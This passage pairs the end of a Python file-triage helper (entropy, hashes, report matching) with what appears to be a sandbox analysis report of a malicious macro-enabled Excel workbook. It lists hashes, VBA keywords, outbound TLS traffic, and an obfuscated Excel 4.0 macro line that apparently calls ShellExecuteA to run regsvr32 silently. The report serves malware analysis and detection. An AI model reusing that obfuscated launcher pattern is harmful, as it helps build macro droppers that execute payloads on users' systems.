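    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage(data: bytes) -> dict:
    """Same fields a sandbox report lists for a dropped file, hashes upper-cased."""
    ent = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": ent,
        "encrypted": ent >= ENCRYPTED_THRESHOLD,
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def matches_report(data: bytes, reported: dict) -> bool:
    """True when every hash or size the report lists agrees with the bytes in hand.
    Keys the report uses but triage() does not know are ignored; one mismatch fails."""
    got = triage(data)
    for key, value in reported.items():
        if key not in got:
            continue
        mine = got[key]
        if isinstance(mine, str):
            if mine != str(value).upper():
                return False
        elif mine != value:
            return False
    return True


# Constructed inputs: a zero-filled stub and a byte-uniform blob (entropy exactly 8.0).
LOW_ENTROPY_SAMPLE = b"\x00" * 330
HIGH_ENTROPY_SAMPLE = bytes(range(256)) * 16

if __name__ == "__main__":
    for label, blob in (("low", LOW_ENTROPY_SAMPLE), ("high", HIGH_ENTROPY_SAMPLE)):
        t = triage(blob)
        print(f"{label}: size={t['size']} entropy={t['entropy']:.6f} "
              f"encrypted={t['encrypted']} sha256={t['sha256']}")
```

To check a recovered file, read it in binary mode and pass the report's row as the `reported` dict (for example `{"size": 330, "sha256": "0C6F8CF0..."}`); hash comparison is case-insensitive because reports differ in case, while size is compared exactly. Entropy near 8.0 identifies compressed or encrypted content equally, so the flag is a cue to unpack, not proof of encryption.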
Static File Info |
---|
General | |
---|---|
Entropy (8bit): | 7.75941359400182 |
File name: | sample20210111-01.xlsm |
File size: | 40268 |
MD5: | fa5350d4304c4c2ceafa435244b5a5fc |
SHA1: | fc8a20962b8cf86568b1e85be02ee9c7b62d94b2 |
SHA256: | 0104974a7bf43e2e31d25ae485f57c62efe89eaea2d3e520db8a76fa70dd956d |
SHA512: | 09cf2c537c358aea59a242b2b25129cc780bcc571e0ef611e2b1eb40078c1ff27356d1a45b1dd42249685e97b18e12173be2dde0e54bf4913fcce4b3703ea625 |
SSDEEP: | 768:1wTZYx6TBDUzVXaI4/ybclX7aV+uFdeq9AQxD2KL0gnp5zFVqJlZ:sa6aVXaPaG7zyvxDhLnzjqJlZ |
File Content Preview: | PK..........!.o.m.....*.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 2 |
OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains VBA Macros: | True |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-12-07T14:38:21Z |
Last Saved Time: | 2021-01-11T13:42:02Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams with VBA |
---|
VBA File Name: Module1.bas, Stream Size: 3215 |
---|
General | |
---|---|
Stream Path: | VBA/Module1 |
VBA File Name: | Module1.bas |
Stream Size: | 3215 |
Data ASCII: | . . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Integer: |
bycilke() |
VB_Name |
MiV(sem.value) |
homepodd() |
homepodd |
Error |
Integer) |
bycilke |
Function |
ol).Name |
"!"): |
String |
"ab": |
Split(govs, |
Randomize: |
yellowsto(yel |
Next: |
ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants) |
yellowsto(Oa)))) |
Integer |
yellowsto |
ol).value |
nimo(Int((UBound(nimo) |
Replace(Vo, |
Chr(sem.Row) |
Sheets(ol).Cells(homepodd, |
"ab")) |
Split(kij(ol), |
yellowsto(homepodd)) |
Rnd)) |
(Run("" |
"moreP_" |
Variant) |
Attribute |
Resume |
pagesREviewsd(Optional |
ecimovert(nimo |
ecimovert |
MsgBox |
VBA File Name: Sheet1.cls, Stream Size: 1614 |
---|
General | |
---|---|
Stream Path: | VBA/Sheet1 |
VBA File Name: | Sheet1.cls |
Stream Size: | 1614 |
Data ASCII: | . . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . |
Data Raw: | 01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 e3 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Index |
VB_Name |
VB_Creatable |
Application.OnTime |
VB_Exposed |
Long) |
ResizePagess() |
VB_Customizable |
"REviewsd" |
VB_Control |
MultiPage" |
VB_TemplateDerived |
MSForms, |
False |
Attribute |
Private |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
ResizePagess |
"pages" |
VBA Code |
---|
|
VBA File Name: ThisWorkbook.cls, Stream Size: 999 |
---|
General | |
---|---|
Stream Path: | VBA/ThisWorkbook |
VBA File Name: | ThisWorkbook.cls |
Stream Size: | 999 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
"ThisWorkbook" |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 554 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 554 |
Entropy: | 5.25519546931 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 3 - D B B 2 9 D 5 C 1 4 7 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 7 3 5 C 4 1 F C C 6 1 0 7 6 5 0 7 6 5 0 7 6 5 0 7 6 5 " . . D P B = " 6 E 6 C 9 D 6 8 E 3 A 8 1 B A 9 1 B A 9 1 |
Data Raw: | 49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 33 2d 44 42 42 32 39 44 35 43 31 34 37 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d |
Stream Path: PROJECTwm, File Type: data, Stream Size: 86 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 86 |
Entropy: | 3.24455457963 |
Base64 Encoded: | False |
Data ASCII: | T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . . |
Data Raw: | 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00 |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 3574 |
Entropy: | 4.46002460936 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
Data Raw: | cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_0 |
File Type: | data |
Stream Size: | 2060 |
Entropy: | 3.45134089702 |
Base64 Encoded: | False |
Data ASCII: | . K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . E . . . . . . C . _ . . . : . . . . . . . . . . |
Data Raw: | 93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00 |
Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_1 |
File Type: | data |
Stream Size: | 187 |
Entropy: | 1.91493173134 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00 |
Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_2 |
File Type: | data |
Stream Size: | 363 |
Entropy: | 2.21122978445 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |
Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_3 |
File Type: | data |
Stream Size: | 398 |
Entropy: | 2.07709195049 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 |
Stream Path: VBA/dir, File Type: data, Stream Size: 820 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 820 |
Entropy: | 6.5044215585 |
Base64 Encoded: | True |
Data ASCII: | . 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 7f 90 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Macro 4.0 Code |
---|
CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()
OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | False |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-12-07T14:38:21Z |
Last Saved Time: | 2021-01-11T13:42:02Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 115 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 115 |
Entropy: | 4.80096587863 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: f, File Type: data, Stream Size: 178 |
---|
General | |
---|---|
Stream Path: | f |
File Type: | data |
Stream Size: | 178 |
Entropy: | 2.59766210867 |
Base64 Encoded: | False |
Data ASCII: | . . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . . |
Data Raw: | 00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 b0 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110 |
---|
General | |
---|---|
Stream Path: | i02/\x1CompObj |
File Type: | data |
Stream Size: | 110 |
Entropy: | 4.63372611993 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i02/f, File Type: data, Stream Size: 40 |
---|
General | |
---|---|
Stream Path: | i02/f |
File Type: | data |
Stream Size: | 40 |
Entropy: | 1.54176014818 |
Base64 Encoded: | False |
Data ASCII: | . . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i02/o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | i02/o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Data ASCII: | |
Data Raw: |
Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110 |
---|
General | |
---|---|
Stream Path: | i03/\x1CompObj |
File Type: | data |
Stream Size: | 110 |
Entropy: | 4.63372611993 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i03/f, File Type: data, Stream Size: 40 |
---|
General | |
---|---|
Stream Path: | i03/f |
File Type: | data |
Stream Size: | 40 |
Entropy: | 1.90677964945 |
Base64 Encoded: | False |
Data ASCII: | . . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i03/o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | i03/o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Data ASCII: | |
Data Raw: |
Stream Path: o, File Type: data, Stream Size: 152 |
---|
General | |
---|---|
Stream Path: | o |
File Type: | data |
Stream Size: | 152 |
Entropy: | 2.68720470607 |
Base64 Encoded: | False |
Data ASCII: | . . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . . |
Data Raw: | 00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80 |
Stream Path: x, File Type: data, Stream Size: 48 |
---|
General | |
---|---|
Stream Path: | x |
File Type: | data |
Stream Size: | 48 |
Entropy: | 1.42267983198 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 |
Macro 4.0 Code |
---|
CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 11, 2021 18:28:00.002847910 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.125716925 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.125803947 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.138995886 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.262025118 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.263251066 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.263308048 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.264287949 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.265647888 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.387058973 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.388211012 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.388309956 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.389369965 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.512084007 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.512468100 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.512512922 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.512586117 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.512613058 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
